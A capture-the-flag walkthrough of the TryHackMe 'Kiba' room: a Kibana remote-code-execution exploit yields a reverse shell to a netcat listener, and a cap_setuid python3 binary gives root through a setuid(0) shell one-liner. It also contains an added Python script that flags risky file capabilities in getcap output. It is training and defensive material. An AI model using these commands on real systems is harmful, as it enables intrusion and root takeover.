# Kiba

### Target Details

Target IP: 10.10.252.150

### Scan Target

* Run the usual Nmap scan command

{% code overflow="wrap" %}

```bash
$ nmap -sCV -Pn -oN nmap.txt 10.10.252.150
$ cat nmap.txt
Nmap scan report for 10.10.252.150
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9df8d157132481b6185d048ed2384f90 (RSA)
|   256 e1e67aa1a11cbe03d24e271b0d0aecb1 (ECDSA)
|_  256 2abae5c5fb51381745e7b154caa1a3fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 15 12:19:16 2023 -- 1 IP address (1 host up) scanned in 114.46 seconds
```

{% endcode %}

* Nmap did not report any other open ports (the default scan only covers the 1,000 most common ports). Since we know the room is about Kibana, we can look up the port Kibana uses: a quick search shows that Kibana listens on port 5601.
* Hosted Services Summary

| Port | Service           |
| ---- | ----------------- |
| 22   | Open SSH service  |
| 80   | Apache Web Server |
| 5601 | Kibana            |

### Navigating Kibana

Visit the Kibana dashboard hosted on <http://10.10.252.150:5601>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2Ft1WXvfhMdUBsSIJNEAtJ%2Fimage.png?alt=media&#x26;token=4a1039b7-3be9-4c89-aad5-6e5e1a25ee9c" alt=""><figcaption><p>Kibana Dashboard</p></figcaption></figure>

* We're logged in as the default user, and the Management tab looks interesting.
* Navigate to management tab

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FV2dnYMIfyquK8WJw2CA0%2Fimage.png?alt=media&#x26;token=f149e3f2-9887-4cac-ae67-8231bcecfe19" alt=""><figcaption><p>Found Version</p></figcaption></figure>

### Searching for Kibana Vulnerabilities and Exploits

* Search for Kibana exploits on your favourite search engine.
* We find a vulnerability with RCE details hosted on Tenable.

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FyXdcwukxA05399cNeK1h%2Fimage.png?alt=media&#x26;token=d4639911-08c9-46b9-9322-116bcdabc74e" alt=""><figcaption><p>Exploit Details on Tenable</p></figcaption></figure>

* Reading the analysis, we find that the P{REDACTED} P{REDACTION} vulnerability was exploited to gain a reverse shell.

### Exploiting Kibana RCE Vuln

* The exploit script link can also be found on the Tenable page.
* Clone the GitHub repo.
* To use the script with Python 3, change `content.data` to `content.data.decode('utf-8')`.
* Start a netcat listener to catch the reverse shell.

```bash
nc -nlvp 1234
```

* Run exploit

{% code overflow="wrap" %}

```bash
./CVE-XXXX-XXXX-kibana-rce.py -u http://10.10.252.150:5601 -host [YOUR_THM_IP] -p 1234 --shell
```

{% endcode %}

* Now we've successfully received a reverse shell on our machine:

```bash
$ nc -nlvp 1234
Connection from 10.10.252.150:34696
bash: cannot set terminal process group (942): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kiba@ubuntu:/home/kiba/kibana/bin$
```

### Capturing Flags

* Get the user.txt flag

```bash
kiba@ubuntu:/home/kiba/kibana/bin$ cd ~
kiba@ubuntu:/home/kiba$ ls
elasticsearch-6.5.4.deb  kibana  user.txt
kiba@ubuntu:/home/kiba$ cat user.txt
cat user.txt
THM{REDACTED}
kiba@ubuntu:/home/kiba$
```

* On quickly searching for how to list capabilities on Ubuntu, I found a useful command. Execute it on the captured shell.

```bash
$ getcap -r /
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
```

* `.hackmeplease` is a hint that we need to use this `python3` binary. On researching, the `cap_setuid+ep` capability allows the binary to set its own UID.
* If we set the UID to 0 using Python, we can run Python commands as root and spawn a shell. The Python `os` module can be used to set the UID.

```bash
/home/kiba/.hackmeplease/python3 -c "import os,pty; os.setuid(0); pty.spawn('/bin/bash');"
```
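To show what a defender would look for in a `getcap` listing like the one above, here is an added Python example that is not part of the original writeup. It parses `getcap -r /` output (both the older `path = caps+flags` layout shown above and the newer `path caps=flags` layout), decodes the capability set and the `e`/`p`/`i` flags, and reports binaries that carry identity-changing or DAC-bypassing capabilities, with extra weight for binaries in hidden, home or temporary directories. The list of high-risk capabilities, the baseline of expected capabilities and the sample listing are constructed for this example (the sample mirrors the listing above).

```python
"""Triage a `getcap -r /` listing for risky file capabilities.

Added example, not code from the original writeup. The high-risk capability
list, the baseline and the sample listing are constructed for illustration.
"""
import re
from dataclasses import dataclass, field

# Capabilities that let a process change identity, bypass discretionary
# access control or ptrace other processes. On a general-purpose
# interpreter or shell any of these is effectively root. Assumed list.
HIGH_RISK_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_ptrace", "cap_sys_admin", "cap_sys_module", "cap_chown",
    "cap_fowner",
}

# Constructed baseline of capabilities a clean install is expected to carry.
# In practice, generate this from a known-good host of the same release.
DEFAULT_BASELINE = {
    "/usr/bin/mtr": {"cap_net_raw"},
    "/usr/bin/traceroute6.iputils": {"cap_net_raw"},
    "/usr/bin/systemd-detect-virt": {"cap_dac_override", "cap_sys_ptrace"},
}

# Locations that should not normally carry any file capability.
SUSPICIOUS_PATH = re.compile(r"(^|/)\.[^/]+/|^/home/|^/tmp/|^/var/tmp/|^/dev/shm/")

# Accepts '/usr/bin/mtr = cap_net_raw+ep' (older getcap layout)
# and     '/usr/bin/mtr cap_net_raw=ep'   (newer getcap layout).
GETCAP_LINE = re.compile(r"^(?P<path>\S+?)\s*(?:=\s*|\s+)(?P<caps>\S+)$")


@dataclass
class CapEntry:
    path: str
    caps: set
    flags: str    # subset of 'e' (effective), 'p' (permitted), 'i' (inheritable)
    reasons: list = field(default_factory=list)

    @property
    def risky(self) -> bool:
        return bool(self.reasons)


def parse_getcap_line(line):
    """Parse one getcap output line; returns None for lines that do not match."""
    m = GETCAP_LINE.match(line.strip())
    if not m:
        return None
    raw = m.group("caps")
    sep = "+" if "+" in raw else "="          # old layout uses '+', new uses '='
    caps_part, _, flags = raw.partition(sep)
    caps = {c.strip().lower() for c in caps_part.split(",") if c.strip()}
    return CapEntry(path=m.group("path"), caps=caps, flags=flags.lower())


def triage(entry, baseline=None):
    """Attach reasons why an entry deserves a second look; none if it matches the baseline."""
    baseline = DEFAULT_BASELINE if baseline is None else baseline
    if baseline.get(entry.path) == entry.caps:
        return entry
    dangerous = sorted(entry.caps & HIGH_RISK_CAPS)
    # 'e' makes the capability active at exec without the program asking for
    # it; 'p' alone still lets a capability-aware program raise it itself.
    if dangerous and ("e" in entry.flags or "p" in entry.flags):
        entry.reasons.append(f"high-risk capability {','.join(dangerous)}+{entry.flags}")
    if SUSPICIOUS_PATH.search(entry.path):
        entry.reasons.append("file capability on a binary in a hidden, home or temp directory")
    return entry


def find_risky(getcap_output, baseline=None):
    """Return risky entries from a full `getcap -r /` listing, most reasons first."""
    entries = (parse_getcap_line(line) for line in getcap_output.splitlines())
    triaged = [triage(e, baseline) for e in entries if e is not None]
    return sorted((e for e in triaged if e.risky), key=lambda e: -len(e.reasons))


# Constructed sample mirroring the listing in the writeup.
SAMPLE_GETCAP = """\
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
"""

if __name__ == "__main__":
    for e in find_risky(SAMPLE_GETCAP):
        print(f"{e.path}: " + "; ".join(e.reasons))
```

Run against a saved `getcap -r /` listing, the hidden `python3` copy is reported twice over: for its `cap_setuid+ep` and for where it lives, while the stock network tools and `systemd-detect-virt` match the baseline and are ignored. Passing an empty baseline shows why the baseline matters: `systemd-detect-virt` legitimately carries `cap_dac_override,cap_sys_ptrace` and would otherwise be flagged on every host.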

* Read the root flag

```bash
root@ubuntu# cat /root/root.txt
THM{REDACTED}
```


